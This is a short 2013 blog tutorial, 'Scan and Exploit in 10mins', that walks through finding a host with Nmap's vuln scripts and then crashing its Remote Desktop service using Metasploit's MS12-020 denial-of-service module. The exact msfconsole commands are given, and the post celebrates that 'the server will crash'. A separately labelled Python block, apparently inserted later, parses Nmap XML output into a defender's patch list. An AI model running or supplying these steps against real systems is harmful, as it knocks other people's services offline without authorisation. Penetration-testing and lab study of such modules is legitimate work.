Thursday, 30 May 2013

NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!


First, we will find a target and make sure the host is up. We will do this with Nmap:
#nmap -sn 192.168.71.156


Once we know the host is up and running, we will use Nmap to look for any critical vulnerabilities. We invoke the command

#nmap --script vuln 192.168.71.156 --reason

With this command, Nmap runs the NSE scripts in the vuln category against the host and checks it for known vulnerabilities. Once the scan has completed, the result lists the vulnerabilities found on the host. The result even provides a link where you can read more about each vulnerability.
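For the defender triaging the same scan (to build a patch list from the `--script vuln` results), here is an added example, not from the original post: it reads Nmap's XML output (`-oX`) and keeps only the findings whose state is confirmed VULNERABLE. The sample XML is constructed, modelled on the table/elem layout the NSE vulns library emits; the reference URL in it is a placeholder.

```python
# Added example, not from the original post: turn the XML output of
# `nmap --script vuln -oX scan.xml <host>` into a list of confirmed findings
# that a defender can feed into a patch queue. SAMPLE_XML is constructed here,
# modelled on the elem/table layout the NSE vulns library emits.
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap">
 <host><address addr="192.168.71.156" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="3389"><state state="open"/>
   <script id="rdp-vuln-ms12-020" output="VULNERABLE">
    <table key="CVE-2012-0002">
     <elem key="title">MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability</elem>
     <elem key="state">VULNERABLE</elem>
     <table key="ids"><elem>CVE:CVE-2012-0002</elem><elem>MSB:MS12-020</elem></table>
     <table key="refs"><elem>https://example.invalid/ms12-020</elem></table>
    </table></script></port>
  <port protocol="tcp" portid="445"><state state="open"/>
   <script id="constructed-check" output="NOT VULNERABLE">
    <table key="constructed-check"><elem key="state">NOT VULNERABLE</elem></table>
   </script></port>
 </ports></host></nmaprun>"""


def vulnerable_findings(xml_text):
    """Return one dict per finding whose state starts with VULNERABLE.

    NOT VULNERABLE, LIKELY VULNERABLE and unknown states are skipped, so the
    list contains only checks the script positively confirmed.
    """
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            for script in port.findall("script"):
                for table in script.findall("table"):
                    state = table.findtext("elem[@key='state']", "")
                    if not state.startswith("VULNERABLE"):
                        continue
                    findings.append({
                        "host": addr,
                        "port": int(port.get("portid")),
                        "script": script.get("id"),
                        "title": table.findtext("elem[@key='title']", ""),
                        "ids": [e.text for e in table.findall("table[@key='ids']/elem")],
                        "refs": [e.text for e in table.findall("table[@key='refs']/elem")],
                    })
    return findings


if __name__ == "__main__":
    for f in vulnerable_findings(SAMPLE_XML):
        print(f"{f['host']}:{f['port']} {f['script']} -> {', '.join(f['ids'])}")
```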



Now let's exploit that vulnerability! First we need to check whether the exploit is in the Metasploit database. On your terminal, run

#locate ms12_020

The output shows that the module is available in Metasploit.

Alternatively, you can also search for the module inside msfconsole itself: start it with #msfconsole and then run
#search ms12_020


Now that we know the module is available, we will execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156
msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf  auxiliary(ms12_020_maxchannelids) > run


Once executed, the server will crash!!! Note that this is a Layer 7 DoS attack!